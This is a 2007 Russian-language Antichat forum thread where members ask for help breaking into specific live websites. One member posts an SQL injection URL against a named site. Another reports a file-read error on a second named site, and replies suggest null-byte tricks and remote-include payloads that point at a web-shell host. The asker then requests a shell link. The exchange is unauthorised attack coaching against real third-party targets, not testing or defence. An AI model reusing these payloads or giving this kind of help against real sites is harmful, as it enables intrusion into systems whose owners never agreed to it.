HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 58 из 1393 « Первая < 848 54 55 56 57 58 59 60 61 62 681081585581058 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #571  
Старый 29.12.2007, 23:05
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию
Спасибо, Scipio, я даже не подозревал что все так сложно... Ну, тогда есть вопрос и по MSSQL:
http://www.thetruthseeker.co.uk/article.asp?ID=1+OR+1=@@version--
Я так понял, что не хватает какого-то оператора. Можете подсказать в чем суть ошибки, и, конечно, показать как правильно составить запрос =)
 

  #572  
Старый 29.12.2007, 23:14
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Это инъекция в MS Access в нем очень сложно провести инъекцию, в твоем случае только если подзапросы помогут (т.е. посимвольный перебор)
__________________
Карфаген должен быть разрушен...
 

  #573  
Старый 29.12.2007, 23:18
~EviL~
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641

Репутация: 205
По умолчанию
Ладно, сегодня явно не мой день Остается надеяться на завтрашний ))
 

  #574  
Старый 30.12.2007, 15:12
HedgeH0g.trj
Новичок
Регистрация: 16.12.2007
Сообщений: 11
Провел на форуме:
54303

Репутация: 0
Question
Вот нашел что-то
*******.ru/index.php?page=viewcom&newscode='
Код:
Warning: fopen() [function.fopen]: Unable to access news/\'.mnf in /www/inquizit/www/htdocs/include/showcom.inc on line 2    Warning: fopen(news/\'.mnf) [function.fopen]: failed to open stream: No such file or directory in /www/inquizit/www/htdocs/include/showcom.inc on line 2    Warning: fgets(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 2	 	  	  Warning: fpassthru(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 5    Warning: filemtime() [function.filemtime]: stat failed for news/\'.mnf in /www/inquizit/www/htdocs/include/showcom.inc on line 5  01.01.70 03:00    Warning: fclose(): supplied argument is not a valid stream resource in /www/inquizit/www/htdocs/include/showcom.inc on line 6
Это php-include? может что-то другое или вообще уязвимости нет..?
Последний раз редактировалось HedgeH0g.trj; 30.12.2007 в 15:22..
 

  #575  
Старый 30.12.2007, 15:14
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию
скорее всего magic_q on поэтому инклуд не пройдет. хотя существует маленькая вероятность addslashes или подобного. попробуй добавить %00
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 

  #576  
Старый 30.12.2007, 15:24
HedgeH0g.trj
Новичок
Регистрация: 16.12.2007
Сообщений: 11
Провел на форуме:
54303

Репутация: 0
По умолчанию
просто после кавычки?
 

  #577  
Старый 30.12.2007, 15:25
bul.666
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705

Репутация: 1403


Отправить сообщение для bul.666 с помощью ICQ
По умолчанию
Цитата:
просто после кавычки?
нет...
?page=viewcom&newscode=http://shell/shell%00
?page=viewcom&newscode=http://shell/shell.php%00
 

  #578  
Старый 30.12.2007, 15:26
HedgeH0g.trj
Новичок
Регистрация: 16.12.2007
Сообщений: 11
Провел на форуме:
54303

Репутация: 0
По умолчанию
скиньте ссылку на шелл плз
короче может на живом примере что-то увидите))
_http://inquizition.ru/index.php?page=viewcom&newscode='
Последний раз редактировалось HedgeH0g.trj; 30.12.2007 в 15:31..
 

  #579  
Старый 30.12.2007, 15:30
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Цитата:
Сообщение от bul.666  
нет...
?page=viewcom&newscode=http://shell/shell%00
?page=viewcom&newscode=http://shell/shell.php%00
Это точно не прокатит, потому что во-первых это читалка а не инклюд (возможно там даже вывода файла нет)

а вовторых перед параметром в fopen добавляется 'news/'

если б была возможность удаленно инклюдить файлы, то и %00 добавлять не надо было бы
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 30.12.2007 в 15:35..
 

  #580  
Старый 30.12.2007, 15:48
HedgeH0g.trj
Новичок
Регистрация: 16.12.2007
Сообщений: 11
Провел на форуме:
54303

Репутация: 0
По умолчанию
Так что, здесь нифига не выйдет?
 
 
Страница 58 из 1393 « Первая < 848 54 55 56 57 58 59 60 61 62 681081585581058 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ